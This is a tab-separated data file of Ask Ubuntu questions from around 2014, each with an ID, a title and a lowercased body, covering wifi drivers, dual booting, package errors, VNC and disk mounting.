473857	ubuntu not display the remote desktop properly ?	i am using : putty [ release 0.63 ] tightvnc viewer for windows [ version 2.7.10 ] windows server 2012 r2 on windows azure . to connect remote desktop of my ubuntu machine on windows azure [ ubuntu 13.10 ] . i have installed desktop and get the result of the command vncserver -geometry 1440x900 like below : new 'paulubuntu:1 ( azureuser ) ' desktop is paulubuntu:1 starting applications specified in /home/azureuser/.vnc/xstartup log file is /home/azureuser/.vnc/paulubuntu:1.log and then open the the vncviewer , enter my password correctly , the only screen display to me is a gray screen with the following 3 lines in it : accept clipboard from viewers . send clipboard to viewers . send primary selection to viewers . is there some issue to display my desktop ? i am newbie to linux system , any idea would be appreciated .
473863	wireless broadcom 4313 ubuntu 14.04 connection established but no traffic	another broadcom 4313 issue . sorry , but after trying to fix it for several hours , you might have a quick look and help me out ! ~ $ lspci -nn -d 14e4 : 24:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) and : ` ~ $ rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : hp-wwan : wireless wan soft blocked : yes hard blocked : no 3 : hp-gps : gps soft blocked : no hard blocked : no 4 : phy0 : wireless lan soft blocked : no hard blocked : no` and : ~ $ lsmod module size used by ctr 13049 1 ccm 17773 1 arc4 12608 2 brcmsmac 563041 0 b43 387371 0 cordic 12574 1 brcmsmac ssb 62379 1 b43 brcmutil 15618 1 brcmsmac bcma 52096 3 b43 , brcmsmac mac80211 626511 2 b43 , brcmsmac cfg80211 484040 3 b43 , brcmsmac , mac80211 bnep 19624 2 rfcomm 69160 0 bluetooth 395423 10 bnep , rfcomm snd_hda_codec_hdmi 46207 1 snd_hda_codec_idt 54645 1 uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core hp_wmi 14062 0 sparse_keymap 13948 1 hp_wmi intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 cdc_mbim 13176 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm 451511 0 cdc_ncm 24511 1 cdc_mbim usbnet 43913 2 cdc_mbim , cdc_ncm snd_hda_intel 52355 3 mii 13934 1 usbnet snd_hda_codec 192906 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel cdc_wdm 19053 1 cdc_mbim snd_hwdep 13602 1 snd_hda_codec cdc_acm 28803 0 snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13216 0 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi aesni_intel 55624 2 snd_timer 29482 2 snd_pcm , snd_seq aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 3 ghash_clmulni_intel , aesni_intel , ablk_helper mei_me 18627 0 i915 783485 4 snd 69238 17 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi mei 82274 1 mei_me joydev 17381 0 lpc_ich 21080 0 serio_raw 13462 0 drm_kms_helper 52758 1 i915 drm 302817 5 i915 , drm_kms_helper i2c_algo_bit 13413 1 i915 soundcore 12680 1 snd tpm_infineon 17372 0 hp_accel 26012 0 video 19476 1 i915 lis3lv02d 20156 1 hp_accel input_polldev 13896 1 lis3lv02d wmi 19177 1 hp_wmi mac_hid 13205 0 parport_pc 32701 1 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc ahci 25819 2 psmouse 102222 0 and : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 thank you very much for your help ! nico
473864	how do i configure pppoe in ubuntu 13.10 ?	i 've been unsuccessfully trying to configure internet in ubuntu 13.10 . i am using pppoe in windows to connect to my isp . i tried following the steps in this link to connect to the internet , but it is not working . http : //ubuntuguide.net/setting-up-pppoe-ubuntu-command
473866	automatically set sudo chmod 777	is there a way to automatially set sudo chmod 777 for all the files , folder and subfolders in a directory . the sudo chmod 777 should automatically be set when a folder or a file is created in the parent directory . is there a way to do that ?
473868	xubuntu 14.04 says it 's connected to wifi but is really slow and wo n't connect to any website as if there is no internet connection	like i said the wifi indicator says it 's connected to the internet with like all of the bars ( i 'm right next to my wifi box ) but , when i open up firefox , it wo n't connect to any website as if there was no internet connection . and when i go to install something in the ubuntu software center it acts likes it 's going to install something and then it fails almost immediately . it 's something to do with this particular netbook and/or xubuntu 14.04 install . help ?
473874	unmet dependencies for libstdc++	when i type : sudo apt-get install libstdc++ i got : the following packages have unmet dependencies : libstdc++-4.8-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-8ubuntu1 is to be installed conflicts : libstdc++6-4.6-doc but 4.6.4-6ubuntu2 is to be installed conflicts : libstdc++6-4.7-doc but 4.7.3-12ubuntu1 is to be installed libstdc++6-4.6-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-8ubuntu1 is to be installed libstdc++6-4.6-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-8ubuntu1 is to be installed libstdc++6-4.7-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-8ubuntu1 is to be installed conflicts : libstdc++6-4.6-dbg but 4.6.4-6ubuntu2 is to be installed libstdc++6-4.7-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-8ubuntu1 is to be installed conflicts : libstdc++6-4.6-doc but 4.6.4-6ubuntu2 is to be installed libstdc++6-4.8-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-8ubuntu1 is to be installed conflicts : libstdc++6-4.6-dbg but 4.6.4-6ubuntu2 is to be installed conflicts : libstdc++6-4.7-dbg but 4.7.3-12ubuntu1 is to be installed libstdc++6-4.8-dbg-armhf-cross : conflicts : libstdc++6-4.7-dbg-armhf-cross but 4.7.3-11ubuntu1cross1.85 is to be installed e : unable to correct problems , you have held broken packages . ideas ? edit : same issues with : sudo apt-get install clang++ got : the following packages have unmet dependencies : clang-3.3 : breaks : clang-3.4 but 1:3.4-1ubuntu3 is to be installed clang-3.4 : breaks : clang-3.3 but 1:3.3-16ubuntu1 is to be installed clang-3.5 : breaks : clang but 1:3.4-0ubuntu1 is to be installed breaks : clang-3.3 but 1:3.3-16ubuntu1 is to be installed breaks : clang-3.4 but 1:3.4-1ubuntu3 is to be installed clang-format-3.3 : breaks : clang-format-3.4 but 1:3.4-1ubuntu3 is to be installed clang-format-3.4 : breaks : clang-format-3.3 but 1:3.3-16ubuntu1 is to be installed clang-format-3.5 : breaks : clang-format-3.3 but 1:3.3-16ubuntu1 is to be installed python-clang-3.3 : breaks : python-clang-3.4 but 1:3.4-1ubuntu3 is to be installed python-clang-3.4 : breaks : python-clang-3.3 but 1:3.3-16ubuntu1 is to be installed breaks : python-clang-3.5 but 1:3.5~svn201651-1ubuntu1 is to be installed python-clang-3.5 : breaks : python-clang-3.3 but 1:3.3-16ubuntu1 is to be installed breaks : python-clang-3.4 but 1:3.4-1ubuntu3 is to be installed e : unable to correct problems , you have held broken packages .
473878	suddenly boot fails on a dual boot system ( xp/ubuntu )	i made my friend try ubuntu 14.04 lts and it worked perfectly at first but after a while the computer did not boot . it showed boot error . i installed it alongside windows xp . so i am really in trouble now . his computer is also very old and slow .
473880	how to check the process is already running or not	i want to check the particular process in already running or not . i refereed this q & a . but i did n't get any specific solution . following is the example that i tried : i have created abc.sh file and run this script on background , like sh abc.sh & . now this file is running on background and i fire the ps aux | grep `` abc '' command . following is the output of this command : prakash 3594 0.0 0.0 4388 820 pts/0 s+ 16:44 0:00 grep -- color=auto abc after that i stop the abc.sh running script and fire the same command ps aux | grep `` abc '' command . but i am getting same output like : prakash 3594 0.0 0.0 4388 820 pts/0 s+ 16:44 0:00 grep -- color=auto abc is there any other way to find the process is running or not ?
473881	screenlets not auto starting in lubuntu	i am trying to auto start folderview screenlets in lubuntu 13.10 there is plenty of advice on the web for ubuntu , with which i did not have any issues . i got the screenlets manager to autostart after adding `` screenlets '' to autostart in lxsession-default-apps , however the folderview 's does not autostart . also in the screenlets manager under options i have selected auto start on login . i 'm going to install 14.04 on another machine to test if that will not work better . any help would be appreciated !
473883	c # pango.layout.getpixelsize ( ) returns wrong width in ubuntu 14.04	i am using the following c # code to get the length of a figure space ( u+2007 ) : int width , height ; screen screen = screen.default ; pango.layout layout = new pango.layout ( pangohelper.contextgetforscreen ( screen ) ) ; layout.fontdescription = pango.fontdescription.fromstring ( `` ubuntu 11 '' ) ; layout.settext ( ( '\u2007 ' ) .tostring ( ) ) ; layout.getpixelsize ( out width , out height ) ; on my ubuntu 13.10 machine width is 9 on my ubuntu 14.04 machine width is 3 i am expecting width to be the same on both machines . any suggestions where to start debugging ?
473884	very slow internet speed in 14.04	i am using firefox/opera for browsing , tried wired/wireless connection but it does not change the situation . i have adsl router connected to asus router wich has wi-fi . i use a few devices in my home through wi-fi and they works fine . previously i had windows installed on my pc and it worked without any problem .
473886	list all versions of a package	is there a equivalent of this command ; yum list kernel-headers -- showduplicates on ubuntu with apt-get , apt-cache etc . the above command lists various versions of the kernel-headers rpm available on f20/rhel or installations . closet i can get using apt-cache showpkg , not sure if there is a better way ? $ apt-cache showpkg linux-image package : linux-image versions : reverse depends : firmware-crystalhd , linux-image systemtap , linux-image fiaif , linux-image dependencies : provides : reverse provides : linux-image-3.13.0-27-lowlatency 3.13.0-27.50 linux-image-3.13.0-27-generic 3.13.0-27.50 linux-image-3.13.0-24-lowlatency 3.13.0-24.47 linux-image-3.13.0-24-generic 3.13.0-24.47 linux-image-3.13.0-24-lowlatency 3.13.0-24.46 linux-image-3.13.0-24-generic 3.13.0-24.46 expecting similar output : $ yum list kernel-headers -- showduplicates loaded plugins : langpacks , refresh-packagekit installed packages kernel-headers.x86_64 3.11.10-301.fc20 @ fedora available packages kernel-headers.x86_64 3.11.10-301.fc20 fedora kernel-headers.x86_64 3.14.4-200.fc20 updates this would help me simply do a downgrade or upgrade to a specific version .
473890	ubuntu 12.04 gui not working after installation	so , i installed ubuntu 12.04 ( via unetbootin ) onto my hard drive ( i did not use a live boot disk to accomplish this task ) . after the installation when i boot up i get 2/4 orange dots and half of the time it will say : could not write bytes , broken pipe and will send me to a virtual terminal ( achieved with ctrl+alt+f1 ) . i have tried commands like service gdm3 restart for gdm3 , lightdm , kde , etc . but all i get is the service unrecognized . i have already thought of a solution , to connect to the internet and run apt-get install ubuntu-desktop , what i would need is the command to connect to the internet . then i could be on my way .
473893	how to combine files	i listen to audiobooks as i work around the house . most audiobooks come in many `` pieces '' ... multiple mp3 files . i need to combine these files into one large file to properly use it . in windows there are several `` merge '' file but i have n't found anything for ubuntu . any suggestions ?
473895	gedit snippets lost	here 's the problem : everytime i close gedit all of my own ( latex ) snippets are lost when i launch it for the next time . default snippets are still available and working . what i tried so far : restart my computer ( i know , this is crude , but sometimes it helps . ) re-install gedit-plugins ( apt-get purge for removal , even cruder . ) export my own snippets within the `` manage snippets menu '' and import them . the reimport did n't work . i can point the tar.gz an click on `` open '' but nothing happens . i 'm using ubuntu 14.04 lts on a core i5 . thanks in advance , markus
473897	backup valuable files in ctl+alt+f1	i 'm having an issue with unity not loading after i log in upon booting . all i get is my desktop background and a cursor , no top bar , no dash . i ca n't use any keyboard shortcuts ( other than ctrl+alt+f1 ) or right click or anything . i 've searched the internet for a solution but all i can find is one regarding the unity plugin in ccsm which has n't fixed my issue . i do n't want to re-install ubuntu but seems it may be my only choice , the problem is i have valuable files on that machine that are n't backed up . is there a way to transfer those files to an external hard drive through the ctrl+alt+f1 tty ? thanks in advance .
473900	using the dd command to copy the content of a folder	i 'm trying to use the dd command to copy the content of the folder boot0 to the my disks intial bytes . this is the command : sudo dd if=boot0/ of=/dev/sdb ibs=440 obs=440 count=1 but i get this error : dd : error reading âboot0/â : is a directory 0+0 records in 0+0 records out 0 bytes ( 0 b ) copied , 0.000209512 s , 0.0 kb/s how can i solve this problem
473902	installing ubuntu 14.04 lts on external hard disk	i wish to install to my 160 gb external hard disk , but it has already got four partitions . this is how my partitions are listed when i use the live cd /dev/sdb /dev/sdb1 -- 100 mb ( system reserved partition ) /dev/sdb2 -- 58 gb ( this is where i want to install the ubuntu ) /dev/sdb3 -- 40 gb ( contains some data ) /dev/sdb4 -- 40 gb ( contains some data ) so when i tried to split up the 58 gb partition in this pattern 56 gb ( for ubuntu ) and 2gb for the swap sapce . the 2 gb is now turned into unusable space instead of free space and i had done some google search on that , it said that only 4 partitions could be created including the primary and the logical . so how should i proceed here inorder to install ubuntu to my external hard disk ? could someone please help me with this ? thanks , varun krishna . p
473909	fullscreen youtube is choppy/lags on my acer aspire v5-123-3634	i 'm new to the os and had some issues with playing youtube videos in fullscreen on my acer aspire v5-123-3634 ultrabook . it runs perfectly fine in low resolutions and in half-screen . it even runs fine on high resolutions in half-screen . but when i fullscreen on 720p it 's unwatchable due to the intense lagging . i 'm currently running a duel-boot windows 8.1 and ubuntu 14.04 . no lagging at all on windows 8.1 . this computer has an amd e1-2100 `` kabini '' 1.0ghz duel-core apu with a radeon hd 8210 . i heard these new kabini apus had driver issues on first release so i was wondering if i needed to use some sort of proprietary driver .
473910	what broke firefox ? after upgrade to 14.04 firefox plugin-container eats 179 % cpu	after my recent upgrade from 13.10 to 14.04 firefox plugin-container eats 179 % cpu , even after disabling all plugins and restarting the browser . before the upgrade i did not have this problem , though firefox performance was poor . is this a known issue , or have i encountered something new ? am i the only one having this ? had to shift over to chromium as firefox had become unresponsive , eating all of cpu and thus completely unusable . i tested it last night with firefox -safe-mode and the result was that my whole system become unresponsive for about 10 minutes , before i was able to log in via virtual console and kill the firefox process .
473913	ubuntu + xen + wifi how ?	have been googling for hours and no closer to getting wlan0 with xenbr0 working or any other options . any help greatly appreciated . release : 3.13.0-27-generic version : # 50-ubuntu smp thu may 15 18:06:16 utc 2014 xen_caps : xen-3.0-x86_64 xen-3.0-x86_32p hvm-3.0-x86_32 hvm-3.0-x86_32p $ sudo brctl addbr xenbr0 $ sudo brctl addif xenbr0 wlan0 ca n't add wlan0 to bridge xenbr0 : operation not supported if i change the /etc/network/interface either wlan0 does start when reboot dom0 or it dies when i try to start a domu . anyone got links to recent xen+wifi help , all the help i have found seems to be old and incomplete .
473914	can not install ubuntu 14.04 - 64 bit	i am getting following error while installing ubuntu 14.04 - 64 bit . the following file did not match its source copy on the cd/dvd : /target/lib/firmware/phanfw.bin thank you
473915	my cursor is flickering on 2 of my 3 monitors	my cursor is flickering on 2 of my 3 monitors on every screen update . i jus had a fresh install of ubuntu 14.04 lts ( 64-bit ) , and now my screens are properly setup , i noticed that my cursor is flickering . i already tried to disable the gnome-settings-daemon cursor plugin and doing a restart , but it keeps hapening ( i set it to on again ) i do n't know if this matters but these are my screens ( x = cursor flickering ) [ x ] [ ] [ x ]
473916	moving /home to an existing directory	although i 've found numerous guides and questions already i still don’t seem to be able to get this to work . situation : i’m trying to move the home folders of 2 users to an already mounted disk . the home folders are now on the hard disk mounted as / . this is an ssd so it’s not really the safest way of storing data ( including mbox files ) so i’m trying to move everything to my raid 1 disc already mounted at /media/datab . there are already some other folders and files located at this drive , so this differs from the guides and ubuntu documentation i’ve found . the guides seem to focus on an entirely new partition . problem : i’ve been able to copy the home folder to the new partition as described in the guides using rsync . so the data is already at the correct disc . the problem is in mounting the directory as /home using fstab . i’ve tried mounting /media/datab/home as /home but this gives an error at boot . can someone see what i’m doing wrong here or help me with the correct way of mounting /home at /media/datab/home ? additional info : fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > uuid=06b46ce6-fb4c-4483-889f-00c07d28c5d4 / ext4 errors=remoun $ uuid=473ec3ce-dd2d-41a6-aad0-7ce5eb176473 none swap sw $ /dev/sdb1 /media/datac ext4 defaults 0 2 /dev/sdc1 /media/dataa ext4 defaults 0 2 /dev/sdd1 /media/datab ext4 defaults 0 2 blkid /dev/sda1 : uuid= '' 06b46ce6-fb4c-4483-889f-00c07d28c5d4 '' type= '' ext4 '' /dev/sda5 : uuid= '' 473ec3ce-dd2d-41a6-aad0-7ce5eb176473 '' type= '' swap '' /dev/sdb1 : uuid= '' c317e2c3-7a12-4bbc-bf10-bf7b988ca934 '' type= '' ext4 '' /dev/sdc1 : uuid= '' 7217a19a-e6c2-4e36-b584-aad1ae2ef622 '' type= '' ext4 '' /dev/sdd1 : uuid= '' ecebe9eb-3838-42f4-8c53-9b391b6ca9c2 '' type= '' ext4 ''
473917	ubuntu 12.04 dropbox daemon problem	i would like dropbox to autostart at startup . i installed dropbox and in dropbox preferences i set `` autostart dropbox at startup '' . at startup i see from system monitor that the process dropbox is running , the command line associated to this process is ~/.dropbox-dist/dropboxd but the dropbox daemon is not running , my files does not sync and the dropbox tray icon does not appear . to start dropbox i have to kill this process from system monitor and start dropbox through the dash ( doing this i have that the dropbox tray icon appears and dropbox works ) . i have already tried : $ sudo apt-get remove -- purge nautilus dropbox $ sudo apt-get autoremove and reinstall dropbox but it did not solve the problem .
473922	dual boot alternatives	i would like to clean install a linux distribution as ubuntu etc . my laptop runs windows 8.1 . i have two options in mind . clean install or dual boot . my technical question is : my laptop have a 8gb ssd drive , which it uses to boot windows with and a 500gb for storage . i wonder what that 8gb ssd stores ? it ca n't store the whole windows install as that would be much more than 8gb . also if i would do a clean install of ubuntu could i use the 8gb ssd to have ubuntu boot up quicker . how would i install it ? option two , if i would like to dual boot , how would i proceed having the ssd to boot both systems ? i also wish to ask about the legacy and uefi differences . windows runs with uefi . so when i 'm installing linux , should i run legacy , and if i dual boot , what option to i choose ?
473926	xubuntu 14.04 wanting to mount nonessential drive during boot	i have a 4tb ntfs external hard drive that i keep my movies/tv on it . for some reason , if i boot xubuntu without the drive plugged-into the computer it will give me an answer along the lines of `` unable to mount /media/tyler/tmc_master_drive the drive is unplugged or unavailable . please press 's ' to skip mounting or 'm ' for manual recovery '' why am i getting this message ? the drive has nothing essential for linux on it ( i can boot xubuntu just fine after pressing s , it 's just kinda annoying )
473928	how to disable slowkeys ?	i 'll admit it : i 'm a slow thinker and a poor typist - i sit with my fingers on the keyboards sometime . is there a way to completely disable the slowkeys function ?
473934	install bashmark on ubuntu 12.04	i followed the instructions at this page : http : //www.huyng.com/projects/bashmarks/ to install bashmark on ubuntu . i have not understood what the guide mean with `` add source ~/.local/bin/bashmarks.sh from within your ~.bash_profile or ~/.bashrc file '' . what am i supposed to do ?
473935	ubuntu 14.04 gtx 750 no image hdmi	i recently built a computer using a geforce gtx 750 . i booted it up first on a small vga display , and that worked great . i plugged in my older larger hdmi tv , but nothing showed up on the screen . i installed the latest drivers for my card using xorg-edgers , but still no luck . the nvidia settings panel shows that i am outputting to hdmi , but nothing is showing up . the ubuntu displays section only shows `` unknown display , '' which i am guessing is the vga .
473938	intall new printer ubuntu 12.04	i want install a zebra tlp 2844 on ubuntu 12.04 , but i need change the model of text-only to raw file . how i configure this ?
473943	i have installed ubuntu 14.04 and when i try to install citrix recevier i am getting ia32-lbs error ?	please give me the detail procedure for installing citrix in the ubuntu
473944	compile rtl8192cu error	cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o ] error 1 make [ 1 ] : *** [ _module_/home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-24-generic' make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg i used following commands sudo chmod +x install.sh sudo ./install .sh the driver is directly downloaded for realtek.com ( rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 ) i am using ubuntu 14.04 i had successfully complied on other previous version of ubuntu i am not a linux expert so please help to install it too .
473945	sound in chrome	hi ( i am a complete novice in all this ! ) , i run the latest version of xubuntu on a small htpc . i recently began having problems with sound . all the sites i could find on the internet kept saying it 's pulseaudio so i fiddled around with settings ect ... i tried everything i could find on the internet to either fix or replace it and nothing worked . i could not find a suitable replacement that would actually work and did n't require a degree in linux to make work . so , in the end i settled with removing pulse completely . as i only use the computer for plex , and that seems to be able to play audio directly to the sound card , there is n't a problem anymore . that is , except for one problem . there is no sound at all from chrome . is there anyway of getting chrome to do what plex does and go directly for the sound card ? or an extension for chrome that does this ? ? ? any help would be greatly appreciated . thanks .
473946	document 's default location has been changed	my ubuntu home folder documents ' location has been changed . i mean on in nautilus on the left panel where the places are showing , if there i click on documents it opens this location `` ~/dropbox/documents/ '' . i wan na change it to default location i.e `` ~/documents/ '' . how could i do this ?
473947	broken package ubuntuone-control-panel-qt	an interrupted installation of updates resulted in ubuntuone-control-panel-qt breaking and now i can not install or update anything . there seems to be an error in python2.7 - importerror : no module named _sysconfigdata_nd dpkg : error processing archive ubuntuone-control-panel-qt_13.09-0ubuntu1_all.deb ( -- install ) : when i try to reinstall the package via .deb a dpkg -- audit yields : the following packages are in a mess due to serious problems during installation . they must be reinstalled for them ( and any packages that depend on them ) to function properly : ⠀python-pexpect python module for automating interactive applications ⠀ubuntuone-control-panel-qt ubuntu one control panel - qt frontend ⠀hplip-data hp linux printing and imaging - data files ⠀python-libxml2 python bindings for the gnome xml library ⠀apport automatically generate crash reports for debugging the following packages are only half configured , probably due to problems configuring them the first time . the configuration should be retried using dpkg -- configure or the configure menu option in dselect : ⠀python-ubuntuone-client ubuntu one client python libraries ⠀python-ubuntuone-control-panel ubuntu one control panel - python libraries -- configure or -- configure -a does n't work any help ?
473949	ubuntu ver 14.04 network discovery not showing up on windows 8 but on windows 7	i have an old pc that is now my new ubuntu machine . currently i was working on sharing a drive so that backups and streaming could take place . i have it set up perfectly on my windows 7 laptop ( able to read and write to it ) . for some reason however my wife 's windows 8 laptop is not showing up on the ubuntu and vice versa . i turned on network discovery on the win8 machine , but that did n't help . thanks in advance edit- i have my win7 and win8 in the same homegroup and both can see each other in the network . also the workgroup is the same .
473951	kernel panic with cheap wi-fi usb adapter	i 've just bought a cheap usb wifi adapter from ebay . it is mediatek based , lsusb outputs : bus 001 device 003 : id 148f:7601 ralink technology , corp . i 'm on 3.13 kernel , and the driver provided in the cd shipped with the adapter did n't wanted to compile . i 've followed this guide and then everything compiled fine . the problem is , when i plug in the adapter it connects fine but , after a couple of seconds , the kernel panics . can anyone help me find out what 's wrong ? here 's a picture of the screen when the pc crashes :
473954	screen does not blank in ubuntu 14.04	i can not get the screen to blank in ubuntu 14.04 . i have set the lock screen to 1 minute . it never blanks . i have installed compiz manager and setup the unity plugin from info i read , this also does not help . i can type ctrl alt l to blank the screen which works . it then blanks properly after that until i reboot . then it will not blank again . could some one please tell me how to get the screen to blank after a specified time when the system is idle like it used to pre 14.04 . thanks , rob
473956	how do i get boot to work correctly after deleting ubuntu partitions ?	so , recently , i got this old computer . i put windows xp on it , and that was fine , but last name i put ubuntu 12.04 on it , but some error about the graphics came up , so i assumed the graphics was just too old . i was planning on removing ubuntu 12.04 and then maybe installing an older version , or just not getting it . well , i 've never removed ubuntu off a computer before , so i just assumed that you delete the partitions ubuntu was on . apparently not . now , when i start up the computer , i get command line-like prompt that is something like 'grub > ' and says 'filesystem not recognized ' or something like that . how do i get it to boot on windows xp again ?
473957	how do you hide icons in the system tray in ubuntu 14.04	i just moved from windows a few days ago and i find it very uncomfortable to have all the icons in the system tray showing all the time . how can i hide them into a drop down ( kind of like in windows ) so i only have a few icons visible all the time , but still have access to all the others just a click away ?
473958	no grub with windows 8/ubuntu & boots to windows ( boot repair & os boot manager do not work )	getting straight to the point , i am trying to install ubuntu 14.04 lts alongside a pre-installed windows 8 ( now updated to 8.1 ) . i am a newbie ( even though i used linux and ubuntu for some time now , i still see myself as a newbie ) , so i would appreciate as much help and clarity as i can get . i am using a toshiba satellite l850-1l1 laptop with the following specs · processor intel ( r ) core ( tm ) i7-3630qm cpu @ 2.40 ghz · 8 gb ram · 64 bit operating system , x64-based processor · 1 tb hdd ( no ssd ) , gpt partitioning scheme ( guid partition table ) · system bios version 6.7 / ec version 6.00 ( no idea if this bit of info will help or not ) i removed about 60 gb of the c partition that has windows . i left it as a new unallocated volume ( i left it as free unpartitioned and unformatted space ) . as for the secure boot and uefi settings in the bios , i left them enabled ( since i read in ask ubuntu that it is always better to try installing with both options enabled ) and shut down the laptop . something worth mentioning , i read an article that said i should switch to csm mode before shutting down and then install ubuntu ; i did not do that . when i change the boot manager from uefi to csm boot , it does not boot anything coz of copyright issues . plus , ubuntu boots in legacy mode and not uefi mode . with try ubuntu i was able to boot the live version without problems , then started installing ubuntu and when i got to the system installation window there was no option that said “install alongside windows 8” . so i picked “something else” , made a 5.77 gb partition ( read somewhere that it is supposed to be 10 % the size of the main system partition ) for swap area and 51.22 gb for booting the main system ( / ) . after installation grub menu opened and i could open ubuntu without problems but with windows , it gave me an error and did not want to boot it . i ran boot repair and it closed with an error and gave me a pop out message saying i should turn off secure boot . after that , there was no grub and it boots straight to windows . here is the first boot repair link : paste.ubuntu.com/7517709 i then formatted the partitions again and did the whole thing again with secure boot disabled this time . again no grub menu and boots straight to windows 8 ( yes windows 8 on my laptop works with secure boot disabled ) , so i entered the live version and ran boot repair again . this time it did not tell me that i should disable secure boot , but it did not solve the problem either . same problem , no grub and boots straight to windows . here is the first boot repair link : paste.ubuntu.com/7536732 a couple of more points : · i can not change the os boot manager in bios , i.e . i can not choose boot priority between windows 8 & ubuntu . simply because that option does not exist · boot manager in bios allows me to choose between csm and uefi only appreciate any help to make the dual boot work . thanks
473960	how to find the list of all available packages along with the lastest version number available in the repositories ?	i want to list all the packages ( installed or not installed ) along with the latest version number available in the repositories . for example : the output of apt-cache policy chromium-browser shows like below $ apt-cache policy chromium-browser chromium-browser : installed : ( none ) candidate : 34.0.1847.116-0ubuntu2 version table : 34.0.1847.116-0ubuntu2 0 500 http : //ftp.cuhk.edu.hk/pub/linux/ubuntu/ trusty/universe amd64 packages so the latest version of chromium-browser package available in the repository is 34.0.1847.116-0ubuntu2 . like that , i want to list the version number along with the package names that are available in repositories . and all i want to do this through command-line . i want the output to be like this , chromium-browser 34.0.1847.116-0ubuntu2 xxxxxxxxxxxxxx yyyyyyyyyyy ... ... ... ... ... ... ... ...
473962	rdp from windows into ubuntu vm	i have an ubuntu 12.04 running as a vm on a windows server 2012 host os on a server . i want to remotely connect into this ubuntu vm from a remote machine which is running windows 7 . how can i do this ? i know i can install xrdp in ubunutu and connect to it using windows remote desktop connection . is there any other method ? does freerdp or remmina support this ? i was looking at freerdp because it supports remotefx and xrdp does not . thanks
473966	how in the living hell can i install wine on ubuntu 14.04 ?	ever since upgrading to ubuntu 14.04 , my genealogy programs stopped working ; looked around , & other windows emulator progs stopped working , as well . this is what i get when updating , then upgrading : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . ( my username ) : ~ $ sudo apt-get install wine1.7 winetricks reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . love linux ubuntu ! however , this would be making me tear out my hair ( provided i had any left ... ) any help , people ?
473970	how to reinstall windows 8 after accidentally wiping it off my hdd	so about half an hour ago i decided to try out ubuntu and in the process of doing so , my hard drive got wiped . my windows 8 installation , and all the files with it are gone . since my laptop came preinstalled with windows 8 , i do n't have a disk or anything to use to install it again . i guess i 'll have to install all of my things again , but first , i just want to know how to get windows 8 back ( will the serial number on the bottom of my laptop work ? ) so i can get back to an os i 'm familiar with . any explanations would be great . please do n't be too technical though .
473972	how to change spread all windows animation speed ?	i know using ccsm i can change the animation speeds of minimize window , open window , etc . but i ca n't find the section that lets me modify the animation speeds of 'spread all windows ' ( super + w shortcut ) and ca n't find the option to change the fade to desktop speed . anyone know where to find it ?
473973	how can i transfer files from one private network to another private network over the internet through command line ?	i want to transfer text files from one network to another using command line . i tried using www.egnyte.com but it ca n't do it through command line . it gives me and `` error curl : ( 7 ) could n't connect to host '' . i ca n't even ping www.egnyte.com through command line but i can open it in my browser . so i guess , that site has blocked the command line usage . can anyone please help resolving this issue or suggesting some other option for file sharing via internet ?
